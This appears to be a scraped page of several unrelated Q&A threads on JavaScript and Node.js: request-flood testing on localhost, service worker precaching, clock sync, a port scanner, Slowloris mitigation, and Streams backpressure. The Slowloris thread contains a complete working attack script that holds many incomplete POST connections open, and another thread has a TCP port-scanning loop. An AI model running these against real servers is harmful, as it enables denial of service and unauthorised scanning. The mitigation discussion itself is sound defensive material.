I would like to understand DoS (denial-of-service) attacks better, and I would like to know what my options are for learning about them with an example.
I have a basic Express server:
app.get('/ping', (req, res) => {
  res.send({ pong: 'pong', time: new Date().valueOf(), memory: process.memoryUsage() })
})
I will separately create some JavaScript code that will make multiple requests to the server, but I don't know how to devise strategies to try and bring down the server (consider that this is all running on localhost).
I want to see what the upper limit on the number of requests is when testing this locally. I am experiencing what is described here: Sending thousands of fetch requests crashes the browser. Out of memory.
The suggestions on that thread are more along the lines of "the browser is running out of memory" and "you should throttle requests", but I am actively trying to max out the number of requests the browser can make without crashing. So far my observation is that the server does not have any difficulty (so maybe I should also make requests from my phone and tablet?).
The code I have run in the browser isn't much more than:
const makeRequestAndLogTime = () => {
  const startTime = new Date().valueOf();
  fetch('http://localhost:4000/ping')
    .then(async (response) => {
      const { time, memory } = await response.json();
      console.log({
        startTime: 0,
        processTime: time - startTime,
        endTime: new Date().valueOf() - startTime,
        serverMemory: memory,
        browserMemory: performance['memory']
      })
    })
}

for (let x = 0; x < 100; x++) {
  makeRequestAndLogTime()
}
Depending on what value I put in for the number of iterations of the for loop, performance gets slower and the browser eventually crashes (as expected). But is there a way I could automate determining the upper limit of requests that I can make from my browsers?
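For reference, this is roughly the kind of automation I have in mind (an untested sketch; the starting batch size, the doubling step, and the failure check are my own assumptions): keep ramping up the batch size until a batch starts failing, then report the last size that completed cleanly.

```js
// Untested sketch: ramp up the number of parallel fetches per batch until
// requests start failing, then report the last batch size that succeeded.
const findRequestLimit = async (url = 'http://localhost:4000/ping') => {
  let batchSize = 100;       // starting batch size (assumption)
  let lastGoodBatchSize = 0;

  while (true) {
    const batch = Array.from({ length: batchSize }, () =>
      fetch(url).then((res) => res.ok)
    );
    const results = await Promise.allSettled(batch);
    const failures = results.filter(
      (r) => r.status === 'rejected' || r.value !== true
    ).length;

    console.log({ batchSize, failures });
    if (failures > 0) break;  // the browser (or server) started struggling

    lastGoodBatchSize = batchSize;
    batchSize *= 2;           // double the load for the next round
  }

  return lastGoodBatchSize;
};

findRequestLimit().then((limit) => console.log('last clean batch size:', limit));
```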
Related
I'm currently working on a small web app which should implement a cache-first scenario (users download the web app at a base where WiFi is provided, and then should be able to use it offline outside).
I'm not using any framework and therefore implement the caching (SW) myself.
As I also integrate some PlayCanvas content (which has its own loading screen) via an iframe, I was wondering what overall strategy in terms of loading would make sense.
In a similar project I simply let the service worker download the assets parallel to the (initial) load of the application.
But it came to my mind that it would be better to implement a workflow which is closer to native app behavior, meaning showing an overall loading screen during the service worker download process and building/showing my main application after this process is finished (or has failed -> forced network scenario, or has already happened before -> offline scenario). Another solution would be to show a non-blocking "Assets are still being downloaded" banner.
The main thoughts leading me to the second workflow were:
The SW loading screen / banner could provide better feedback to the user: "All assets downloaded - I'm safe to go offline", while the old scenario could cause issues here, successfully showing the user the first state while some critical files are still being downloaded in the background.
With the SW loading screen the download process is a bit more controllable/understandable for me, as the parallel processes of the SW download and, for example, the PlayCanvas loading become sequential.
It would be great if someone could provide me with feedback/info on:
whether I'm on the right track with this second scenario being better, or whether it is just overhead
how / whether it might be possible to implement a cheap loading screen, meaning for example "100 of 230 files downloaded" or similar
better strategies for this scenario in general
As always, thanks for any heads up in advance.
A lot of this comes down to what you want your users to experience. The underlying technology is there to accomplish any of the scenarios you outline.
For instance, if you want to show information about the precaching progress during initial service worker installation, you could do that by adding code along the lines of the following.
In your service worker:
const PRECACHE_NAME = "...";
const URLS_TO_PRECACHE = [
  // ...
];

async function notifyClients(urlsCached, totalURLs) {
  const clients = await self.clients.matchAll({ includeUncontrolled: true });
  for (const client of clients) {
    client.postMessage({ urlsCached, totalURLs });
  }
}

self.addEventListener("install", (event) => {
  event.waitUntil(
    (async () => {
      const cache = await caches.open(PRECACHE_NAME);
      const totalURLs = URLS_TO_PRECACHE.length;
      let urlsCached = 0;

      for (const urlToPrecache of URLS_TO_PRECACHE) {
        await cache.add(urlToPrecache);
        urlsCached++;
        await notifyClients(urlsCached, totalURLs);
      }
    })()
  );
});
In your client pages:
// Optional: if controller is not set, then there isn't already a
// previous service worker, so this is a "first-time" install.
// If you would prefer, you could add this event listener
// unconditionally, and you'll get update messages even when there's an
// updated service worker.
if (!navigator.serviceWorker.controller) {
  navigator.serviceWorker.addEventListener("message", (event) => {
    const { urlsCached, totalURLs } = event.data;
    // Display a message about how many URLs have been cached.
  });
}
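And as a rough illustration of the "100 of 230 files downloaded" display asked about in the question, a minimal sketch of that message handler's body could look like this (the #precache-progress element is an assumption, not something from your page):

```js
// Minimal sketch: assumes an element like <div id="precache-progress"></div> exists.
const progressElement = document.querySelector("#precache-progress");

navigator.serviceWorker.addEventListener("message", (event) => {
  const { urlsCached, totalURLs } = event.data;
  progressElement.textContent = `${urlsCached} of ${totalURLs} files downloaded`;

  if (urlsCached === totalURLs) {
    progressElement.textContent = "All assets downloaded - you're safe to go offline";
  }
});
```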
I have a game app (Electron) and a web app (testing on Android Chrome) that pass messages via a WebSocket server. I want to coordinate a countdown between the two processes. It doesn't have to be perfect, but what I've observed is that if I run in an environment with low latency it's fine; the more lag there is in the system, the more the Electron app seems to try to start far earlier than the web app. I've tested all my math and it should synchronize, but it just doesn't.
First the web app initiates the start of the countdown by passing a starting time to the game app:
const timeToGameStart: number = peerConnection.timeToGameStart(); // time to game start = 3 x (the longest time it took to pass a previous msg from game app to web app)
const currUnixTime: number = peerConnection.currUnixTime();
const startGameTime: number = currUnixTime + timeToGameStart;
const startGame: StartGame = <StartGame>{
  msg_data_type: Msg_Data_Type.StartGame,
  game_start_time: startGameTime
}
peerConnection.passMsg(startGame);
setTimeout(timer.start, timeToGameStart);
Below is the game app's portion of the code, which responds to the message passed through the server:
const gameStartTime: number = (<StartGame> msgData).game_start_time;
const currUnixTime: number = ServerConnection.currUnixTime();
// If we are on time, wait until the right time; if we are late, start at the next whole second of the countdown (3, 2, 1)
const countDownLength: number = 3;
if (currUnixTime <= gameStartTime) {
  setTimeout(() => startCountDown(countDownLength), currUnixTime - gameStartTime);
} else {
  const timeWeAreLateBy: number = currUnixTime - gameStartTime;
  const timeWeAreLateByInSec: number = Math.ceil(timeWeAreLateBy / 1000);
  const shortCountDownLen: number = Math.max(countDownLength - timeWeAreLateByInSec, 0);
  const timeToNextSec: number = Math.max((1000 * timeWeAreLateByInSec) - timeWeAreLateBy, 0);
  setTimeout(() => startCountDown(shortCountDownLen), timeToNextSec);
}
The problem is that these two separate processes are on separate OSs, which each have a different definition of time, i.e. (new Date()).getTime() returns different numbers. The difference was 2 seconds, so the controller thought there was no lag in the connection and was telling the app to start ASAP.
The solution was that I had to define a consistent measurement of time. After each app connects to the server, it syncs its time with the server by requesting the server's current time.
I didn't need a super precise time sync, so I used a simple algorithm that got the job done. The algorithm calculates how far the process's clock is off from the server's. The formula I used was server_time_diff = server_time - (received_time - RTT/2), where RTT is the time it took to request the time from the server. Now, to get unified (server) time, you just call Date.now() + server_time_diff.
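As a rough illustration, a minimal sketch of that sync step on the client could look like this (the GET /time endpoint and its response shape are hypothetical, not the actual API):

```js
// Minimal sketch of the clock-sync step described above.
// Assumes a hypothetical GET /time endpoint returning { serverTime: <ms since epoch> }.
let serverTimeDiff = 0;

async function syncClock() {
  const requestStart = Date.now();
  const response = await fetch('/time');
  const { serverTime } = await response.json();
  const receivedTime = Date.now();

  const rtt = receivedTime - requestStart; // round-trip time of the request
  serverTimeDiff = serverTime - (receivedTime - rtt / 2);
}

// "Unified" (server) time, usable by both processes once they have synced:
function currUnixTime() {
  return Date.now() + serverTimeDiff;
}
```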
Any ideas for improving my algorithm are welcome.
I'm having an issue with calling a function in a loop in JavaScript. As I'm new to JavaScript, I thought perhaps my approach is wrong. Can someone help me out with the following issue?
Basically, each time I learn a new language, I try and write a port scanner in it. In Python, I used a for loop to iterate over a range of numbers, passing them in as ports to a host. It worked fine and I attempted the same approach in JavaScript, with some socket connection code I found online:
const net = require('net');

function Scanner(host, port) {
  const s = new net.Socket();
  s.setTimeout(2000, function () { s.destroy(); });
  s.connect(port, host, function () {
    console.log('Open: ' + port);
  });
  s.on('data', function (data) {
    console.log(port + ': ' + data);
    s.destroy();
  });
  s.on('error', function (e) {
    s.destroy();
  })
}

for (let p = 15000; p < 30000; p++) {
  let scan = new Scanner('localhost', p);
}
In the above example, I'm iterating over a port range of 15000 to 30000. It appears to run very fast, giving me two results: ports 15292 and 15393 as being open on my test VM. However, it's not picking up several ports in the 20,000 range, like 27017.
If I narrow the range from 25000 to 30000 it picks those up just fine. The problem seems to be when I have a larger range, the code isn't discovering anything after a few hits.
In looking at some other JS implementations of port scanners, I noticed the same issue. It works great when the range is 5,000 ports or so, but scale it up to 20k or 30k ports and it only finds the first few open ones.
What am I doing wrong?
Update
https://nodejs.org/pt-br/blog/vulnerability/february-2019-security-releases/
Update Friday, 13th 2018:
I managed to convince the Node.js core team to assign a CVE for this.
The fix (new defaults and probably a new API) will be there in 1 or 2 weeks.
To mitigate means to lessen the impact of an attack.
Everybody knows Slowloris:
HTTP header or POST data characters are transmitted very slowly in order to keep the socket occupied.
Scaled up, that makes for a much easier DoS attack.
**In NGINX, the mitigation is built in:**
> Closing Slow Connections
> You can close connections that are writing
> data too infrequently, which can represent an attempt to keep
> connections open as long as possible (thus reducing the server’s
> ability to accept new connections). Slowloris is an example of this
> type of attack. The client_body_timeout directive controls how long
> NGINX waits between writes of the client body, and the
> client_header_timeout directive controls how long NGINX waits between
> writes of client headers. The default for both directives is 60
> seconds. This example configures NGINX to wait no more than 5 seconds
> between writes from the client for either headers or body.
https://www.nginx.com/blog/mitigating-ddos-attacks-with-nginx-and-nginx-plus/
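For reference, the example that quoted passage describes is a configuration along these lines (the directive names come from the NGINX documentation; treat this as a sketch rather than a drop-in config):

```nginx
server {
    # Close the connection if the client pauses for more than 5 seconds
    # between writes of the request headers or the request body.
    client_header_timeout 5s;
    client_body_timeout 5s;
}
```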
Since there is no built-in way to work on the headers in the HTTP server in Node.js, I came to the question of whether I can combine `net` and an HTTP server to mitigate Slowloris.
The idea to `destroy` the `connection` in case of `Slowloris` is this:
http.createServer(function (req, res) {
  var timeout;
  // Watch the underlying socket; if no further data arrives within
  // 100 ms of the last chunk, assume Slowloris and destroy the connection.
  req.connection.on('data', function (chunk) {
    clearTimeout(timeout);
    timeout = setTimeout(function () {
      req.connection.destroy();
    }, 100);
  });
});
The problem I can see is that both services would have to listen on the same socket, on ports 80 and 443.
I do not know how to tackle this.
It is possible to transfer requests and responses from net to the HTTP server and back.
But this takes 2 sockets for 1 incoming message.
And 2 sockets for 1 outgoing message.
So this is not feasible for a highly available server.
I have no clue.
What can the world do to get rid of this scourge?
There is a CVE for Apache Tomcat.
This is a serious security threat.
I think this needs to be solved at the C or C++ level.
I cannot write in these "real programmer" languages.
But all of us would be helped if somebody pushed this on GitHub,
because the community there once deleted my thread about mitigating Slowloris.
The best way to mitigate this issue, as well as a number of other issues, is to place a proxy layer such as nginx or a firewall between the node.js application and the internet.
If you're familiar with the paradigms behind many design and programming approaches, such as OOP, you will probably recognize the importance of "separation of concerns".
The same paradigm holds true when designing the infrastructure or the way clients can access data.
The application should have only one concern: handling data operations (CRUD). This inherently includes any concerns that relate to maintaining data integrity (SQL injection threats, script injection threats, etc.).
Other concerns should be placed in a separate layer, such as an nginx proxy layer.
For example, nginx will often be concerned with routing traffic to your application / load balancing. This will include security concerns related to network connections, such as SSL/TLS negotiation, slow clients, etc.
An extra firewall might (read: should) be implemented to handle additional security concerns.
The solution for your issue is simple: do not directly expose the Node.js application to the internet; use a proxy layer - it exists for a reason.
I think you're taking a wrong approach for this vulnerability.
This doesn't deal with a DDoS attack (Distributed Denial of Service), where many IPs are used and you need to continue serving some machines that are behind the same firewall as machines involved in the attack.
Often the machines used in a DDoS aren't real machines that have been taken over (they may be virtualized, or software may be used to attack from different IPs).
When a DDoS against a large target starts, per-IP throttling may ban all machines from the same firewalled LAN.
To continue providing service in the face of a DDoS, you really need to block requests based on common elements of the request itself, not just the IP. security.se may be the best forum for specific advice on how to do that.
Unfortunately, DoS attacks, unlike XSRF, don't need to originate from real browsers, so any headers that don't contain closely held and unguessable nonces can be spoofed.
The recommendation: to prevent this issue, you need good firewall policies against DDoS attacks and large-scale denial of service.
BUT! If you want to test a denial of service with Node.js, you can use this code (use it only for test purposes, not in a production environment):
var net = require('net');

var maxConnections = 30;
var connections = [];
var host = "127.0.0.1";
var port = 80;

function Connection(h, p)
{
  this.state = 'active';
  this.t = Date.now();
  this.client = net.connect({port:p, host:h}, () => {
    process.stdout.write("Connected, Sending... ");
    // Send an incomplete POST body: the declared Content-Length is never
    // fully delivered, so the server keeps the connection waiting.
    this.client.write("POST / HTTP/1.1\r\nHost: "+host+"\r\n" +
      "Content-Type: application/x-www-form-urlencoded\r\n" +
      "Content-Length: 385\r\n\r\nvx=321&d1=fire&l");
    process.stdout.write("Written.\n");
  });
  this.client.on('data', (data) => {
    console.log("\t-Received "+data.length+" bytes...");
    this.client.end();
  });
  this.client.on('end', () => {
    var d = Date.now() - this.t;
    this.state = 'ended';
    console.log("\t-Disconnected (duration: " +
      (d/1000).toFixed(3) +
      " seconds, remaining open: " +
      connections.length +
      ").");
  });
  this.client.on('error', () => {
    this.state = 'error';
  });
  connections.push(this);
}

setInterval(() => {
  var notify = false;
  // Add another connection if we haven't reached
  // our max:
  if(connections.length < maxConnections)
  {
    new Connection(host, port);
    notify = true;
  }
  // Remove dead connections
  connections = connections.filter(function(v) {
    return v.state=='active';
  });
  if(notify)
  {
    console.log("Active connections: " + connections.length +
      " / " + maxConnections);
  }
}, 500);
It is as easy as this.
var http = require('http');

var server = http.createServer(function (req, res) {
  res.end('Now.');
});

server.setTimeout(10);
server.listen(80, '127.0.0.1');
server.setTimeout([msecs][, callback])
> By default, the Server's timeout value is 2 minutes, and sockets are
> destroyed automatically if they time out.
https://nodejs.org/api/http.html#http_server_settimeout_msecs_callback
Tested with:
var net = require('net');

var client = new net.Socket();
client.connect(80, '127.0.0.1', function () {
  setInterval(function () {
    client.write('Hello World.');
  }, 10000);
});
This is only the second-best solution, since legitimate slow connections are terminated as well.
I am having trouble consuming the response from my WebFlux server via JavaScript's new Streams API.
I can see via curl (with the help of --limit-rate) that the server is slowing down as expected, but when I try to consume the body in Google Chrome (64.0.3282.140), it is not slowing down like it should. In fact, Chrome downloads and buffers about 32 megabytes from the server even though only about 187 kB are passed to write().
Is there something wrong with my JavaScript?
async function fetchStream(url, consumer) {
  const response = await fetch(url, {
    headers: {
      "Accept": "application/stream+json"
    }
  });
  const decoder = new TextDecoder("utf-8");
  let buffer = "";
  await response.body.pipeTo(new WritableStream({
    async write(chunk) {
      buffer += decoder.decode(chunk);
      const blocks = buffer.split("\n");
      if (blocks.length === 1) {
        return;
      }
      const indexOfLastBlock = blocks.length - 1;
      for (let index = 0; index < indexOfLastBlock; index++) {
        const block = blocks[index];
        const item = JSON.parse(block);
        await consumer(item);
      }
      buffer = blocks[indexOfLastBlock];
    }
  }));
}
According to the specification for Streams,

> If no strategy is supplied, the default behavior will be the same as a
> CountQueuingStrategy with a high water mark of 1.

So it should slow down when the promise returned by consumer(item) resolves very slowly, right?
Looking at the backpressure support in the Streams API, it seems that backpressure information is communicated within the streams chain and not over the network. In this case, we can assume an unbounded queue somewhere, and this would explain the behavior you're seeing.
This other GitHub issue suggests that the backpressure information indeed stops at the TCP level - they just stop reading from the TCP socket, which, depending on the current TCP window size/TCP configuration, means the buffers will be filled and then TCP flow control kicks in. As this issue states, they can't set the window size manually and they have to let the TCP stack handle things from there.
HTTP/2 supports flow control at the protocol level, but I don't know if the browser implementations leverage that with the Streams API.
I can't explain the behavior difference you're seeing, but I think you might be reading too much into the backpressure support here, and that this works as expected according to the spec.
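For what it's worth, the queuing strategy can also be passed explicitly. A minimal sketch (a stripped-down variant of the fetchStream function above, without the line splitting and JSON parsing) would look like this; per the above, it only bounds the queue inside the stream chain, not the network-level buffers:

```js
// Sketch: same shape as fetchStream above, but with an explicit
// CountQueuingStrategy. This bounds the internal queue between the
// readable and writable sides; it does not shrink the TCP buffers
// discussed above.
async function fetchStreamWithStrategy(url, consumer) {
  const response = await fetch(url, {
    headers: { "Accept": "application/stream+json" }
  });
  await response.body.pipeTo(
    new WritableStream(
      {
        async write(chunk) {
          await consumer(chunk); // backpressure applies within the stream chain
        }
      },
      new CountQueuingStrategy({ highWaterMark: 1 })
    )
  );
}
```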